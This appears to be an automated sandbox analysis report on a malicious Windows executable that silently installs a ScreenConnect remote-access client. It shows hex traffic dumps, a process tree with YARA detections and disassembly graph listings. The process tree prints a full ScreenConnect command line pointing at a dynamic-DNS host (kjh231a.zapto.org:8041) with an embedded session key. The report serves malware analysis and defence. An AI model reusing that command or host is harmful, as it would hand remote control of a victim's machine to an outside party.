                                                                                                                                                                                                                                                      2024-10-25 17:27:49 UTC16384INData Raw: 00 80 00 00 5f 16 fe 03 2a 3e 1f fe 73 0b 0c 00 06 25 02 7d 35 06 00 04 2a 00 00 00 13 30 03 00 59 00 00 00 3f 01 00 11 73 be 0b 00 06 0a 06 03 7d f9 05 00 04 06 7b f9 05 00 04 28 15 02 00 2b 2d 02 15 2a 02 28 10 06 00 06 06 fe 06 bf 0b 00 06 73 a4 09 00 0a 28 16 02 00 2b 7e d0 05 00 04 25 2d 17 26 7e cf 05 00 04 fe 06 8d 0b 00 06 73 76 05 00 0a 25 80 d0 05 00 04 16 28 22 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 40 01 00 11 73 a5 09 00 0a 0a 06 03 7d a6 09 00 0a 02 06 fe 06 a7 09 00 0a 73 a8 09 00 0a 15 28 17 02 00 2b 7e a9 09 00 0a 25 2d 17 26 7e aa 09 00 0a fe 06 ab 09 00 0a 73 ac 09 00 0a 25 80 a9 09 00 0a 28 18 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 41 01 00 11 7e ad 09 00 0a 72 16 40 00 70 02 8c 65 00 00 01 28 23 06 00 0a 6f ae 09 00 0a 0a
                                                                                                                                                                                                                                                      Data Ascii: _*>s%}5*0Y?s}{(+-*(s(+~%-&~sv%("+*0E@s}s(+~%-&~s%(+*0.A~r@pe(#o
                                                                                                                                                                                                                                                      2024-10-25 17:27:49 UTC16384INData Raw: 87 02 00 04 02 28 46 00 00 0a 2a 1e 02 7b 84 02 00 04 2a 1e 02 7b 85 02 00 04 2a 1e 02 7b 86 02 00 04 2a 1e 02 7b 87 02 00 04 2a 32 02 7b 82 02 00 04 6f 7e 06 00 0a 2a 36 02 7b 83 02 00 04 03 6f 18 0b 00 0a 2a 1e 02 7b 94 02 00 04 2a 22 02 03 7d 94 02 00 04 2a e6 02 28 d7 00 00 0a 02 20 06 20 00 00 17 28 32 04 00 0a 02 16 28 a2 00 00 0a 02 17 6f fb 01 00 0a 02 17 28 19 0b 00 0a 02 28 1a 0b 00 0a 02 28 ba 01 00 0a 28 f8 01 00 0a 2a 76 02 28 29 08 00 0a 25 20 00 00 00 80 6f eb 04 00 0a 25 20 88 00 00 00 6f ec 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 90 01 00 11 0f 01 28 ef 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f2 01 00 0a 28 1b 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f2 01 00 0a 28 86 00 00 0a 73 41 05 00 0a 2a 02 02 28 f0 01 00 0a 02 28 ec 01 00 0a 02 28
                                                                                                                                                                                                                                                      Data Ascii: (F*{*{*{*{*2{o~*6{o*{*"}*( (2(o((((*v()% o% o*0(,+((((,((sA*(((


                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:13:27:12
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Qjq85KfhBC.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Qjq85KfhBC.exe"
                                                                                                                                                                                                                                                      Imagebase:0x910000
                                                                                                                                                                                                                                                      File size:83'368 bytes
                                                                                                                                                                                                                                                      MD5 hash:FDB2A84FFCB57C0BFBBF0AADB9BAD790
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                      Start time:13:27:12
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                      Imagebase:0x21cce550000
                                                                                                                                                                                                                                                      File size:24'856 bytes
                                                                                                                                                                                                                                                      MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                      Start time:13:27:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                      Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:13:27:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648
                                                                                                                                                                                                                                                      Imagebase:0xef0000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                      Start time:13:27:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748
                                                                                                                                                                                                                                                      Imagebase:0xef0000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                      Start time:13:27:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                      Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                      Start time:13:27:15
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                      Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                      Start time:13:27:51
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                      Imagebase:0xf70000
                                                                                                                                                                                                                                                      File size:600'864 bytes
                                                                                                                                                                                                                                                      MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                      Start time:13:27:52
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                      Imagebase:0x110000
                                                                                                                                                                                                                                                      File size:95'520 bytes
                                                                                                                                                                                                                                                      MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                      Start time:13:27:52
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                      Imagebase:0x110000
                                                                                                                                                                                                                                                      File size:95'520 bytes
                                                                                                                                                                                                                                                      MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                      Start time:13:27:53
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "bd7f42b5-0144-4d3f-871e-9605118ce260" "User"
                                                                                                                                                                                                                                                      Imagebase:0x70000
                                                                                                                                                                                                                                                      File size:600'864 bytes
                                                                                                                                                                                                                                                      MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:2.2%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:3.8%
                                                                                                                                                                                                                                                        Total number of Nodes:1464
                                                                                                                                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                                                                                                                                        execution_graph 6590 917351 6591 91735e 6590->6591 6592 91480c _abort 15 API calls 6591->6592 6593 917378 6592->6593 6594 914869 _free 15 API calls 6593->6594 6595 917384 6594->6595 6596 91480c _abort 15 API calls 6595->6596 6600 9173aa 6595->6600 6597 91739e 6596->6597 6599 914869 _free 15 API calls 6597->6599 6598 9159b3 6 API calls 6598->6600 6599->6600 6600->6598 6601 9173b6 6600->6601 5947 915fd0 5948 915fdc ___scrt_is_nonwritable_in_current_image 5947->5948 5959 9156e2 EnterCriticalSection 5948->5959 5950 915fe3 5960 915c8b 5950->5960 5952 915ff2 5958 916001 5952->5958 5973 915e64 GetStartupInfoW 5952->5973 5956 916012 _abort 5984 91601d 5958->5984 5959->5950 5961 915c97 ___scrt_is_nonwritable_in_current_image 5960->5961 5962 915ca4 5961->5962 5963 915cbb 5961->5963 5965 9147f9 _free 15 API calls 5962->5965 5987 9156e2 EnterCriticalSection 5963->5987 5966 915ca9 5965->5966 5967 91473d _abort 21 API calls 5966->5967 5969 915cb3 _abort 5967->5969 5968 915cf3 5995 915d1a 5968->5995 5969->5952 5970 915cc7 5970->5968 5988 915bdc 5970->5988 5974 915e81 5973->5974 5975 915f13 5973->5975 5974->5975 5976 915c8b 22 API calls 5974->5976 5979 915f1a 5975->5979 5978 915eaa 5976->5978 5977 915ed8 GetFileType 5977->5978 5978->5975 5978->5977 5980 915f21 5979->5980 5981 915f64 GetStdHandle 5980->5981 5982 915fcc 5980->5982 5983 915f77 GetFileType 5980->5983 5981->5980 5982->5958 5983->5980 5999 91572a LeaveCriticalSection 5984->5999 5986 916024 5986->5956 5987->5970 5989 91480c _abort 15 API calls 5988->5989 5991 915bee 5989->5991 5990 915bfb 5992 914869 _free 15 API calls 5990->5992 5991->5990 5994 9159b3 6 API calls 5991->5994 5993 915c4d 5992->5993 5993->5970 5994->5991 5998 91572a LeaveCriticalSection 5995->5998 5997 915d21 5997->5969 5998->5997 5999->5986 6126 917a10 6129 917a27 6126->6129 6130 917a35 6129->6130 6131 917a49 6129->6131 6132 9147f9 _free 15 API calls 6130->6132 6133 917a51 6131->6133 6134 917a63 6131->6134 6135 917a3a 6132->6135 6136 9147f9 _free 15 API calls 6133->6136 6138 913f72 __fassign 33 API calls 6134->6138 6141 917a22 6134->6141 6139 91473d _abort 21 API calls 6135->6139 6137 917a56 6136->6137 6140 91473d _abort 21 API calls 6137->6140 6138->6141 6139->6141 6140->6141 5748 916893 GetProcessHeap 6602 912f53 6603 912f62 6602->6603 6604 912f7e 6602->6604 6603->6604 6605 912f68 6603->6605 6606 91522b 46 API calls 6604->6606 6607 9147f9 _free 15 API calls 6605->6607 6608 912f85 GetModuleFileNameA 6606->6608 6609 912f6d 6607->6609 6610 912fa9 6608->6610 6611 91473d _abort 21 API calls 6609->6611 6625 913077 6610->6625 6622 912f77 6611->6622 6614 9131ec 15 API calls 6615 912fd3 6614->6615 6616 912fe8 6615->6616 6617 912fdc 6615->6617 6619 913077 33 API calls 6616->6619 6618 9147f9 _free 15 API calls 6617->6618 6624 912fe1 6618->6624 6621 912ffe 6619->6621 6620 914869 _free 15 API calls 6620->6622 6623 914869 _free 15 API calls 6621->6623 6621->6624 6623->6624 6624->6620 6626 91309c 6625->6626 6627 9155b6 33 API calls 6626->6627 6629 9130fc 6626->6629 6627->6626 6628 912fc6 6628->6614 6629->6628 6630 9155b6 33 API calls 6629->6630 6630->6629 6142 917419 6152 917fb2 6142->6152 6146 917426 6165 91828e 6146->6165 6149 917450 6150 914869 _free 15 API calls 6149->6150 6151 91745b 6150->6151 6169 917fbb 6152->6169 6154 917421 6155 9181ee 6154->6155 6156 9181fa ___scrt_is_nonwritable_in_current_image 6155->6156 6189 9156e2 EnterCriticalSection 6156->6189 6158 918205 6159 918270 6158->6159 6161 918244 DeleteCriticalSection 6158->6161 6190 91901c 6158->6190 6203 918285 6159->6203 6163 914869 _free 15 API calls 6161->6163 6163->6158 6164 91827c _abort 6164->6146 6166 9182a4 6165->6166 6167 917435 DeleteCriticalSection 6165->6167 6166->6167 6168 914869 _free 15 API calls 6166->6168 6167->6146 6167->6149 6168->6167 6170 917fc7 ___scrt_is_nonwritable_in_current_image 6169->6170 6179 9156e2 EnterCriticalSection 6170->6179 6172 91806a 6184 91808a 6172->6184 6173 917fd6 6173->6172 6178 917f6b 61 API calls 6173->6178 6180 917465 EnterCriticalSection 6173->6180 6181 918060 6173->6181 6177 918076 _abort 6177->6154 6178->6173 6179->6173 6180->6173 6187 917479 LeaveCriticalSection 6181->6187 6183 918068 6183->6173 6188 91572a LeaveCriticalSection 6184->6188 6186 918091 6186->6177 6187->6183 6188->6186 6189->6158 6191 919028 ___scrt_is_nonwritable_in_current_image 6190->6191 6192 919039 6191->6192 6193 91904e 6191->6193 6194 9147f9 _free 15 API calls 6192->6194 6199 919049 _abort 6193->6199 6206 917465 EnterCriticalSection 6193->6206 6195 91903e 6194->6195 6197 91473d _abort 21 API calls 6195->6197 6197->6199 6198 91906a 6207 918fa6 6198->6207 6199->6158 6201 919075 6223 919092 6201->6223 6461 91572a LeaveCriticalSection 6203->6461 6205 91828c 6205->6164 6206->6198 6208 918fb3 6207->6208 6209 918fc8 6207->6209 6210 9147f9 _free 15 API calls 6208->6210 6221 918fc3 6209->6221 6226 917f05 6209->6226 6211 918fb8 6210->6211 6214 91473d _abort 21 API calls 6211->6214 6214->6221 6215 91828e 15 API calls 6216 918fe4 6215->6216 6232 91732b 6216->6232 6218 918fea 6239 919d4e 6218->6239 6221->6201 6222 914869 _free 15 API calls 6222->6221 6460 917479 LeaveCriticalSection 6223->6460 6225 91909a 6225->6199 6227 917f1d 6226->6227 6231 917f19 6226->6231 6228 91732b 21 API calls 6227->6228 6227->6231 6229 917f3d 6228->6229 6254 9189a7 6229->6254 6231->6215 6233 917337 6232->6233 6234 91734c 6232->6234 6235 9147f9 _free 15 API calls 6233->6235 6234->6218 6236 91733c 6235->6236 6237 91473d _abort 21 API calls 6236->6237 6238 917347 6237->6238 6238->6218 6240 919d5d 6239->6240 6245 919d72 6239->6245 6241 9147e6 __dosmaperr 15 API calls 6240->6241 6244 919d62 6241->6244 6242 919dad 6243 9147e6 __dosmaperr 15 API calls 6242->6243 6246 919db2 6243->6246 6247 9147f9 _free 15 API calls 6244->6247 6245->6242 6248 919d99 6245->6248 6250 9147f9 _free 15 API calls 6246->6250 6251 918ff0 6247->6251 6417 919d26 6248->6417 6252 919dba 6250->6252 6251->6221 6251->6222 6253 91473d _abort 21 API calls 6252->6253 6253->6251 6255 9189b3 ___scrt_is_nonwritable_in_current_image 6254->6255 6256 9189d3 6255->6256 6257 9189bb 6255->6257 6259 918a71 6256->6259 6264 918a08 6256->6264 6279 9147e6 6257->6279 6261 9147e6 __dosmaperr 15 API calls 6259->6261 6263 918a76 6261->6263 6262 9147f9 _free 15 API calls 6274 9189c8 _abort 6262->6274 6265 9147f9 _free 15 API calls 6263->6265 6282 915d23 EnterCriticalSection 6264->6282 6267 918a7e 6265->6267 6269 91473d _abort 21 API calls 6267->6269 6268 918a0e 6270 918a2a 6268->6270 6271 918a3f 6268->6271 6269->6274 6273 9147f9 _free 15 API calls 6270->6273 6283 918a92 6271->6283 6276 918a2f 6273->6276 6274->6231 6275 918a3a 6332 918a69 6275->6332 6277 9147e6 __dosmaperr 15 API calls 6276->6277 6277->6275 6280 9144a8 _abort 15 API calls 6279->6280 6281 9147eb 6280->6281 6281->6262 6282->6268 6284 918ac0 6283->6284 6291 918ab9 _ValidateLocalCookies 6283->6291 6285 918ae3 6284->6285 6286 918ac4 6284->6286 6289 918b34 6285->6289 6290 918b17 6285->6290 6287 9147e6 __dosmaperr 15 API calls 6286->6287 6288 918ac9 6287->6288 6292 9147f9 _free 15 API calls 6288->6292 6293 918b4a 6289->6293 6335 918f8b 6289->6335 6294 9147e6 __dosmaperr 15 API calls 6290->6294 6291->6275 6295 918ad0 6292->6295 6338 918637 6293->6338 6298 918b1c 6294->6298 6300 91473d _abort 21 API calls 6295->6300 6299 9147f9 _free 15 API calls 6298->6299 6302 918b24 6299->6302 6300->6291 6305 91473d _abort 21 API calls 6302->6305 6303 918b91 6306 918ba5 6303->6306 6307 918beb WriteFile 6303->6307 6304 918b58 6308 918b5c 6304->6308 6309 918b7e 6304->6309 6305->6291 6312 918bdb 6306->6312 6313 918bad 6306->6313 6310 918c0e GetLastError 6307->6310 6316 918b74 6307->6316 6314 918c52 6308->6314 6345 9185ca 6308->6345 6350 918417 GetConsoleCP 6309->6350 6310->6316 6370 9186ad 6312->6370 6317 918bb2 6313->6317 6318 918bcb 6313->6318 6314->6291 6320 9147f9 _free 15 API calls 6314->6320 6316->6291 6316->6314 6323 918c2e 6316->6323 6317->6314 6359 91878c 6317->6359 6364 91887a 6318->6364 6322 918c77 6320->6322 6325 9147e6 __dosmaperr 15 API calls 6322->6325 6326 918c35 6323->6326 6327 918c49 6323->6327 6325->6291 6328 9147f9 _free 15 API calls 6326->6328 6375 9147c3 6327->6375 6330 918c3a 6328->6330 6331 9147e6 __dosmaperr 15 API calls 6330->6331 6331->6291 6416 915d46 LeaveCriticalSection 6332->6416 6334 918a6f 6334->6274 6380 918f0d 6335->6380 6402 917eaf 6338->6402 6340 918647 6341 91864c 6340->6341 6342 914424 _abort 33 API calls 6340->6342 6341->6303 6341->6304 6343 91866f 6342->6343 6343->6341 6344 91868d GetConsoleMode 6343->6344 6344->6341 6347 918624 6345->6347 6349 9185ef 6345->6349 6346 918626 GetLastError 6346->6347 6347->6316 6348 919101 WriteConsoleW CreateFileW 6348->6349 6349->6346 6349->6347 6349->6348 6351 91858c _ValidateLocalCookies 6350->6351 6353 91847a 6350->6353 6351->6316 6353->6351 6354 918500 WideCharToMultiByte 6353->6354 6356 9172b7 35 API calls __fassign 6353->6356 6358 918557 WriteFile 6353->6358 6411 916052 6353->6411 6354->6351 6355 918526 WriteFile 6354->6355 6355->6353 6357 9185af GetLastError 6355->6357 6356->6353 6357->6351 6358->6353 6358->6357 6360 91879b 6359->6360 6361 918819 WriteFile 6360->6361 6362 91885d _ValidateLocalCookies 6360->6362 6361->6360 6363 91885f GetLastError 6361->6363 6362->6316 6363->6362 6369 918889 6364->6369 6365 91890b WideCharToMultiByte 6367 918940 WriteFile 6365->6367 6368 91898c GetLastError 6365->6368 6366 918994 _ValidateLocalCookies 6366->6316 6367->6368 6367->6369 6368->6366 6369->6365 6369->6366 6369->6367 6372 9186bc 6370->6372 6371 91872e WriteFile 6371->6372 6373 918771 GetLastError 6371->6373 6372->6371 6374 91876f _ValidateLocalCookies 6372->6374 6373->6374 6374->6316 6376 9147e6 __dosmaperr 15 API calls 6375->6376 6377 9147ce _free 6376->6377 6378 9147f9 _free 15 API calls 6377->6378 6379 9147e1 6378->6379 6379->6291 6389 915dfa 6380->6389 6382 918f1f 6383 918f27 6382->6383 6384 918f38 SetFilePointerEx 6382->6384 6385 9147f9 _free 15 API calls 6383->6385 6386 918f50 GetLastError 6384->6386 6387 918f2c 6384->6387 6385->6387 6388 9147c3 __dosmaperr 15 API calls 6386->6388 6387->6293 6388->6387 6390 915e07 6389->6390 6392 915e1c 6389->6392 6391 9147e6 __dosmaperr 15 API calls 6390->6391 6394 915e0c 6391->6394 6393 9147e6 __dosmaperr 15 API calls 6392->6393 6395 915e41 6392->6395 6396 915e4c 6393->6396 6397 9147f9 _free 15 API calls 6394->6397 6395->6382 6399 9147f9 _free 15 API calls 6396->6399 6398 915e14 6397->6398 6398->6382 6400 915e54 6399->6400 6401 91473d _abort 21 API calls 6400->6401 6401->6398 6403 917ec9 6402->6403 6404 917ebc 6402->6404 6407 917ed5 6403->6407 6408 9147f9 _free 15 API calls 6403->6408 6405 9147f9 _free 15 API calls 6404->6405 6406 917ec1 6405->6406 6406->6340 6407->6340 6409 917ef6 6408->6409 6410 91473d _abort 21 API calls 6409->6410 6410->6406 6412 914424 _abort 33 API calls 6411->6412 6413 91605d 6412->6413 6414 9172d1 __fassign 33 API calls 6413->6414 6415 91606d 6414->6415 6415->6353 6416->6334 6420 919ca4 6417->6420 6419 919d4a 6419->6251 6421 919cb0 ___scrt_is_nonwritable_in_current_image 6420->6421 6431 915d23 EnterCriticalSection 6421->6431 6423 919cbe 6424 919cf0 6423->6424 6425 919ce5 6423->6425 6427 9147f9 _free 15 API calls 6424->6427 6432 919dcd 6425->6432 6428 919ceb 6427->6428 6447 919d1a 6428->6447 6430 